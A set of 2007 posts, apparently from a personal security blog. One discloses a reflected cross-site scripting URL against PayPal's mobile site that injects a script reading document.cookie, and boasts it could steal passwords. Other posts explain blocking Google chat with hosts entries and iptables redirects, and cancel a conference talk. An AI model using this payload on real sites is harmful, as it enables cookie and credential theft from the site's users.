Wednesday, October 31, 2007

It's XSS snack time of the day...

PayPal is secure, you can use it for all transactions... Recommended by HackerSafe seal
https://mobile.paypal.com/cgi-bin/wapapp?cmd=_wapapp-static&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

While I was messing with the website, I came across this XSS bug in PayPal, which can be used with JavaScript to steal passwords ;))

/Quit

Monday, October 29, 2007

Google chat can be blocked without blocking google.com as a whole. You must block chatenabled.mail.google.com, along with ports 443 and 80 to talk.google.com. Linux users can use iptables to redirect the traffic to 127.0.0.1 (your local loopback address). You can also use the old-fashioned /etc/hosts for the same...

I had to write this post here, because there's been a lot of attention to blocking Google's chat lately.

Cheers :)
Kish
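
The two approaches from the post above, as an added sketch that is not part of the original post: an idempotent /etc/hosts update and a generator for the iptables redirect rules. The hostnames and ports are the ones the post names; the function names, and applying both ports to both hostnames, are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Hostnames and ports come from
# the post; function names and the port/host pairing are assumptions.
CHAT_HOSTS="chatenabled.mail.google.com talk.google.com"
CHAT_PORTS="80 443"

# Append "127.0.0.1 <host>" to the given hosts file for each chat host.
# Hosts already mapped on an uncommented line are skipped, so repeated
# runs do not duplicate entries.
block_in_hosts() {
    hosts_file=$1
    for h in $CHAT_HOSTS; do
        if ! awk -v h="$h" '
            $1 !~ /^#/ {
                for (i = 2; i <= NF; i++) {
                    if ($i ~ /^#/) break      # rest of the line is a comment
                    if ($i == h) found = 1
                }
            }
            END { exit !found }' "$hosts_file"
        then
            printf '127.0.0.1\t%s\n' "$h" >> "$hosts_file"
        fi
    done
}

# Print (not apply) iptables rules that send locally generated chat traffic
# to the loopback address. iptables resolves the name once, when the rule is
# inserted, so the rules must be reloaded if the service's addresses change.
redirect_rules() {
    for h in $CHAT_HOSTS; do
        for p in $CHAT_PORTS; do
            echo "iptables -t nat -A OUTPUT -p tcp -d $h --dport $p -j DNAT --to-destination 127.0.0.1"
        done
    done
}

# Review the rules before applying them as root: sh thisfile --print
case "${1:-}" in
    --print) redirect_rules ;;
esac
```

A hosts entry only affects name lookups on the machine where it is set, and the nat OUTPUT rules only affect traffic generated on that machine.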

Sunday, October 14, 2007



I was invited to speak at the LegionSec 07 conference, but due to professional engagements, I am unable to deliver the talk as promised. The conference organizer has been informed about the glitch.

Cheers :)
Kish